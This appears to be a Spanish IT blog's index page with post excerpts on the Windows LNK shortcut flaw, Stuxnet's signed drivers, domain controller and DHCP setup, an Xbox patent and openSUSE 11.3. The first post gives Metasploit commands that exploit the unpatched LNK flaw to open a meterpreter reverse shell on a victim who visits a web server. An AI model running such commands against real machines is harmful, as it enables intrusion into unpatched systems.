Explotando «LNK» con MetaSploit

rokitoh Deja un comentario

MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con «svn update», y luego hacemos lo siguiente:

use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit

De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!

Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:

Microsoft Security Advisory (2286198)
– Security By Default: Solución a la vulnerabilidad «LNK» de Windows mediante Directivas de Restricción de Software
Fuente: http://www.kungfoosion.com/

La nueva variante del Stuxnet vuelve a estar firmada con un certificado válid

rokitoh Deja un comentario

El último ataque contra Windows (con enlaces directos) fue descubierto a través de un troyano que ha sido bautizado como Stuxnet. Una de sus características era que los drivers que usaba estaban firmados digitalmente por la famosa empresa china Realtek. Ahora, después de que hayan sido revocados, los atacantes han comenzado a utilizar los de otra empresa legítima: JMicron Technology Corporation.

Los drivers de Stuxnet utilizados como rootkit, estaban firmados digitalmente por la famosa empresa china Realtek. Esto significa que, en principio, solo Realtek puede ser responsable de ese código… excepto que su clave privada haya sido comprometida de alguna forma, cosa que no se ha confirmado todavía. En cualquier caso, Microsoft ha trabajado con Verisign para revocar en sus sistemas los certificados (con el apoyo de Realtek también). Parece que ante este «contratiempo» los atacantes han reaccionado firmando su troyano de nuevo con un certificado válido de otra empresa Taiwanesa dedicada también a crear controladores, llamada JMicron.

Leer más

Instalar un controlador de dominio secundario

rokitoh 1 comentario

Bueno, ya anteriormente había publicado como instalar un controlador de dominio principal (PDC) y adicional (CDA)

Instalar un controlador de dominio principal

Instalar un controlador de dominio adicional

Ahora vamos a integrarle un controlador de dominio secundario, al que llamaremos CDS

Herramientas necesarias para montar CDS

Virtualbox: Para virtualizar nuestro CDS.

Sistema operativo: Windows 2003 Server Enterprise Edition.

Tener instalado: Controlador de domino Principal y Adicional.

Leer más

Interesante (y peligroso) troyano que aprovecha un interesante 0 day en Microsoft Windows

rokitoh Deja un comentario

Se ha descubierto un nuevo ataque contra Windows, que aprovecha una vulnerabilidad previamente desconocida. Lo interesante (y peligroso) en este caso, es que esta vulnerabilidad ha sido utilizada como nuevo método «revolucionario» para eludir la desactivación de AutoRun y ejecutarse bajo cualquier circunstancia cuando se inserta en el sistema una memoria USB extraíble, por ejemplo. Además, el troyano ha sido firmado digitalmente por una compañía legítima.

Cómo ha sido descubierto

VirusBlokAda descubrió, ya el 17 de junio (lo que da una idea de la posible cantidad de tiempo que esta amenaza lleva atacando silenciosamente) módulos de un malware nuevo. Pasadas unas semanas, alertaron sobre algo realmente inusual en este troyano: su forma de propagarse a través de memorias USB prescindiendo del tradicional archivo autorun.inf, que permite la ejecución automática cuando se detecta un dispositivo extraíble y funcionalidad contra la que Microsoft lleva tiempo luchando.

Leer más

Microsoft patenta un nuevo mando para Xbox 360

rokitoh Deja un comentario

Se trata de un híbrido: inalámbrico y cable, según lo decida el jugador.

A principios de año Microsoft intentó patentar una nueva tecnología en la oficina de patentes de los Estados Unidos. Finalmente esta semana parece haber sido aprobada y, a tenor de lo que se ha liberado, se trataría de una tecnología relacionada con un nuevo mando híbrido, «dual», para Xbox 360. Según puede verse en el esquema, el nuevo mando incluiría opción de usarse con o sin cable, de forma completamente automática y sin retardos.

Leer más

Instalar servidor DHCP en Debian

rokitoh Deja un comentario

Antes de empezar a instalar, vamos a recordar algunos conceptos básicos pero importantes.

DHCP ( Dynamic Host Configuration Protocol – Protocolo Dinámico de Configuración de Anfitrión)

Se trata de un protocolo de tipo cliente/servidor en el que generalmente un servidor posee una lista de direcciones IP dinámicas y las va asignando a los clientes conforme éstas van estando libres, sabiendo en todo momento quién ha estado en posesión de esa IP, cuánto tiempo la ha tenido y a quién se la ha asignado después.

ESCUCHA POR EL PUERTO: 68 UDP
TRABSNUTE POR EL PUERTO: 67 UDP

Que es un Agente de Retransmisión DHCP: Es un software que retransmite mensajes DHCP y BOOTP entre clientes y servidores en diferentes subredes.

Leer más

openSUSE 11.3, al fin con nosotros

rokitoh Deja un comentario

Después de unas cuantas Milestones y de alguna versión preliminar más que hemos cubierto con habilidad -porque había poco que contar, la verdad- se ha cumplido el roadmap de openSUSE 11.3, cuya versión final por fin está disponible para que todos podáis descargarla y disfrutarla.

En openSUSE 11.3 encontramos entre otras cosas el kernel Linux 2.6.34, además de GNOME 2.30.1 y KDE SC 4.4.4. Ya vimos en anteriores análisis de openSUSE en MuyComputer que openSUSE era la distribución con la mejor integración de KDE de las que habíamos visto, y la verdad es que estoy impaciente por saber si han logrado integrar igual de bien las nuevas versiones de KDE en openSUSE 11.3

Leer más